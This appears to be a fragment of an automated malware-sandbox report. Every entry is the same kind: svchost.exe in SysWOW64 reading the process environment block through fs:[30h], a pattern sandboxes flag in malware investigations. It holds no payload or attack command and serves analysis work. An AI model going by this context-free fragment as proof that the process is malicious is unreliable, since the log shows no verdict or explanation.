Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038EC188 mov eax, dword ptr fs:[00000030h]	1_2_038EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038EC188 mov eax, dword ptr fs:[00000030h]	1_2_038EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038D4180 mov eax, dword ptr fs:[00000030h]	1_2_038D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038D4180 mov eax, dword ptr fs:[00000030h]	1_2_038D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B019F mov eax, dword ptr fs:[00000030h]	1_2_038B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B019F mov eax, dword ptr fs:[00000030h]	1_2_038B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B019F mov eax, dword ptr fs:[00000030h]	1_2_038B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B019F mov eax, dword ptr fs:[00000030h]	1_2_038B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0382A197 mov eax, dword ptr fs:[00000030h]	1_2_0382A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0382A197 mov eax, dword ptr fs:[00000030h]	1_2_0382A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0382A197 mov eax, dword ptr fs:[00000030h]	1_2_0382A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038F61C3 mov eax, dword ptr fs:[00000030h]	1_2_038F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038F61C3 mov eax, dword ptr fs:[00000030h]	1_2_038F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038AE1D0 mov ecx, dword ptr fs:[00000030h]	1_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039061E5 mov eax, dword ptr fs:[00000030h]	1_2_039061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038601F8 mov eax, dword ptr fs:[00000030h]	1_2_038601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h]	1_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038DE10E mov ecx, dword ptr fs:[00000030h]	1_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h]	1_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h]	1_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038DE10E mov ecx, dword ptr fs:[00000030h]	1_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h]	1_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h]	1_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038DE10E mov ecx, dword ptr fs:[00000030h]	1_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h]	1_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038DE10E mov ecx, dword ptr fs:[00000030h]	1_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038DA118 mov ecx, dword ptr fs:[00000030h]	1_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038DA118 mov eax, dword ptr fs:[00000030h]	1_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038DA118 mov eax, dword ptr fs:[00000030h]	1_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038DA118 mov eax, dword ptr fs:[00000030h]	1_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038F0115 mov eax, dword ptr fs:[00000030h]	1_2_038F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03860124 mov eax, dword ptr fs:[00000030h]	1_2_03860124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038C4144 mov eax, dword ptr fs:[00000030h]	1_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038C4144 mov eax, dword ptr fs:[00000030h]	1_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038C4144 mov ecx, dword ptr fs:[00000030h]	1_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038C4144 mov eax, dword ptr fs:[00000030h]	1_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038C4144 mov eax, dword ptr fs:[00000030h]	1_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0382C156 mov eax, dword ptr fs:[00000030h]	1_2_0382C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038C8158 mov eax, dword ptr fs:[00000030h]	1_2_038C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03836154 mov eax, dword ptr fs:[00000030h]	1_2_03836154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03836154 mov eax, dword ptr fs:[00000030h]	1_2_03836154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03904164 mov eax, dword ptr fs:[00000030h]	1_2_03904164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03904164 mov eax, dword ptr fs:[00000030h]	1_2_03904164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383208A mov eax, dword ptr fs:[00000030h]	1_2_0383208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038280A0 mov eax, dword ptr fs:[00000030h]	1_2_038280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038C80A8 mov eax, dword ptr fs:[00000030h]	1_2_038C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038F60B8 mov eax, dword ptr fs:[00000030h]	1_2_038F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038F60B8 mov ecx, dword ptr fs:[00000030h]	1_2_038F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B20DE mov eax, dword ptr fs:[00000030h]	1_2_038B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0382A0E3 mov ecx, dword ptr fs:[00000030h]	1_2_0382A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038380E9 mov eax, dword ptr fs:[00000030h]	1_2_038380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B60E0 mov eax, dword ptr fs:[00000030h]	1_2_038B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0382C0F0 mov eax, dword ptr fs:[00000030h]	1_2_0382C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038720F0 mov ecx, dword ptr fs:[00000030h]	1_2_038720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B4000 mov ecx, dword ptr fs:[00000030h]	1_2_038B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]	1_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]	1_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]	1_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]	1_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]	1_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]	1_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]	1_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]	1_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0384E016 mov eax, dword ptr fs:[00000030h]	1_2_0384E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0384E016 mov eax, dword ptr fs:[00000030h]	1_2_0384E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0384E016 mov eax, dword ptr fs:[00000030h]	1_2_0384E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0384E016 mov eax, dword ptr fs:[00000030h]	1_2_0384E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0382A020 mov eax, dword ptr fs:[00000030h]	1_2_0382A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0382C020 mov eax, dword ptr fs:[00000030h]	1_2_0382C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038C6030 mov eax, dword ptr fs:[00000030h]	1_2_038C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03832050 mov eax, dword ptr fs:[00000030h]	1_2_03832050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B6050 mov eax, dword ptr fs:[00000030h]	1_2_038B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385C073 mov eax, dword ptr fs:[00000030h]	1_2_0385C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038D678E mov eax, dword ptr fs:[00000030h]	1_2_038D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038307AF mov eax, dword ptr fs:[00000030h]	1_2_038307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038E47A0 mov eax, dword ptr fs:[00000030h]	1_2_038E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383C7C0 mov eax, dword ptr fs:[00000030h]	1_2_0383C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B07C3 mov eax, dword ptr fs:[00000030h]	1_2_038B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038527ED mov eax, dword ptr fs:[00000030h]	1_2_038527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038527ED mov eax, dword ptr fs:[00000030h]	1_2_038527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038527ED mov eax, dword ptr fs:[00000030h]	1_2_038527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038BE7E1 mov eax, dword ptr fs:[00000030h]	1_2_038BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038347FB mov eax, dword ptr fs:[00000030h]	1_2_038347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038347FB mov eax, dword ptr fs:[00000030h]	1_2_038347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386C700 mov eax, dword ptr fs:[00000030h]	1_2_0386C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03830710 mov eax, dword ptr fs:[00000030h]	1_2_03830710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03860710 mov eax, dword ptr fs:[00000030h]	1_2_03860710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386C720 mov eax, dword ptr fs:[00000030h]	1_2_0386C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386C720 mov eax, dword ptr fs:[00000030h]	1_2_0386C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386273C mov eax, dword ptr fs:[00000030h]	1_2_0386273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386273C mov ecx, dword ptr fs:[00000030h]	1_2_0386273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386273C mov eax, dword ptr fs:[00000030h]	1_2_0386273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038AC730 mov eax, dword ptr fs:[00000030h]	1_2_038AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386674D mov esi, dword ptr fs:[00000030h]	1_2_0386674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386674D mov eax, dword ptr fs:[00000030h]	1_2_0386674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386674D mov eax, dword ptr fs:[00000030h]	1_2_0386674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03830750 mov eax, dword ptr fs:[00000030h]	1_2_03830750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038BE75D mov eax, dword ptr fs:[00000030h]	1_2_038BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872750 mov eax, dword ptr fs:[00000030h]	1_2_03872750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872750 mov eax, dword ptr fs:[00000030h]	1_2_03872750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B4755 mov eax, dword ptr fs:[00000030h]	1_2_038B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03838770 mov eax, dword ptr fs:[00000030h]	1_2_03838770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]	1_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]	1_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]	1_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]	1_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]	1_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]	1_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]	1_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]	1_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]	1_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]	1_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]	1_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]	1_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03834690 mov eax, dword ptr fs:[00000030h]	1_2_03834690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03834690 mov eax, dword ptr fs:[00000030h]	1_2_03834690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386C6A6 mov eax, dword ptr fs:[00000030h]	1_2_0386C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038666B0 mov eax, dword ptr fs:[00000030h]	1_2_038666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386A6C7 mov ebx, dword ptr fs:[00000030h]	1_2_0386A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386A6C7 mov eax, dword ptr fs:[00000030h]	1_2_0386A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_038AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_038AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_038AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_038AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B06F1 mov eax, dword ptr fs:[00000030h]	1_2_038B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B06F1 mov eax, dword ptr fs:[00000030h]	1_2_038B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038AE609 mov eax, dword ptr fs:[00000030h]	1_2_038AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]	1_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]	1_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]	1_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]	1_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]	1_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]	1_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]	1_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03872619 mov eax, dword ptr fs:[00000030h]	1_2_03872619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0384E627 mov eax, dword ptr fs:[00000030h]	1_2_0384E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03866620 mov eax, dword ptr fs:[00000030h]	1_2_03866620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03868620 mov eax, dword ptr fs:[00000030h]	1_2_03868620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383262C mov eax, dword ptr fs:[00000030h]	1_2_0383262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0384C640 mov eax, dword ptr fs:[00000030h]	1_2_0384C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038F866E mov eax, dword ptr fs:[00000030h]	1_2_038F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038F866E mov eax, dword ptr fs:[00000030h]	1_2_038F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386A660 mov eax, dword ptr fs:[00000030h]	1_2_0386A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386A660 mov eax, dword ptr fs:[00000030h]	1_2_0386A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03862674 mov eax, dword ptr fs:[00000030h]	1_2_03862674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03832582 mov eax, dword ptr fs:[00000030h]	1_2_03832582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03832582 mov ecx, dword ptr fs:[00000030h]	1_2_03832582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03864588 mov eax, dword ptr fs:[00000030h]	1_2_03864588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386E59C mov eax, dword ptr fs:[00000030h]	1_2_0386E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B05A7 mov eax, dword ptr fs:[00000030h]	1_2_038B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B05A7 mov eax, dword ptr fs:[00000030h]	1_2_038B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B05A7 mov eax, dword ptr fs:[00000030h]	1_2_038B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038545B1 mov eax, dword ptr fs:[00000030h]	1_2_038545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038545B1 mov eax, dword ptr fs:[00000030h]	1_2_038545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386E5CF mov eax, dword ptr fs:[00000030h]	1_2_0386E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386E5CF mov eax, dword ptr fs:[00000030h]	1_2_0386E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038365D0 mov eax, dword ptr fs:[00000030h]	1_2_038365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386A5D0 mov eax, dword ptr fs:[00000030h]	1_2_0386A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386A5D0 mov eax, dword ptr fs:[00000030h]	1_2_0386A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038325E0 mov eax, dword ptr fs:[00000030h]	1_2_038325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386C5ED mov eax, dword ptr fs:[00000030h]	1_2_0386C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386C5ED mov eax, dword ptr fs:[00000030h]	1_2_0386C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038C6500 mov eax, dword ptr fs:[00000030h]	1_2_038C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]	1_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]	1_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]	1_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]	1_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]	1_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]	1_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]	1_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]	1_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]	1_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]	1_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]	1_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]	1_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]	1_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385E53E mov eax, dword ptr fs:[00000030h]	1_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385E53E mov eax, dword ptr fs:[00000030h]	1_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385E53E mov eax, dword ptr fs:[00000030h]	1_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385E53E mov eax, dword ptr fs:[00000030h]	1_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385E53E mov eax, dword ptr fs:[00000030h]	1_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03838550 mov eax, dword ptr fs:[00000030h]	1_2_03838550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03838550 mov eax, dword ptr fs:[00000030h]	1_2_03838550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386656A mov eax, dword ptr fs:[00000030h]	1_2_0386656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386656A mov eax, dword ptr fs:[00000030h]	1_2_0386656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386656A mov eax, dword ptr fs:[00000030h]	1_2_0386656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038EA49A mov eax, dword ptr fs:[00000030h]	1_2_038EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038364AB mov eax, dword ptr fs:[00000030h]	1_2_038364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038644B0 mov ecx, dword ptr fs:[00000030h]	1_2_038644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038BA4B0 mov eax, dword ptr fs:[00000030h]	1_2_038BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038304E5 mov ecx, dword ptr fs:[00000030h]	1_2_038304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03868402 mov eax, dword ptr fs:[00000030h]	1_2_03868402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03868402 mov eax, dword ptr fs:[00000030h]	1_2_03868402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03868402 mov eax, dword ptr fs:[00000030h]	1_2_03868402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0382E420 mov eax, dword ptr fs:[00000030h]	1_2_0382E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0382E420 mov eax, dword ptr fs:[00000030h]	1_2_0382E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0382E420 mov eax, dword ptr fs:[00000030h]	1_2_0382E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0382C427 mov eax, dword ptr fs:[00000030h]	1_2_0382C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]	1_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]	1_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]	1_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]	1_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]	1_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]	1_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]	1_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]	1_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]	1_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]	1_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]	1_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]	1_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]	1_2_0386E443
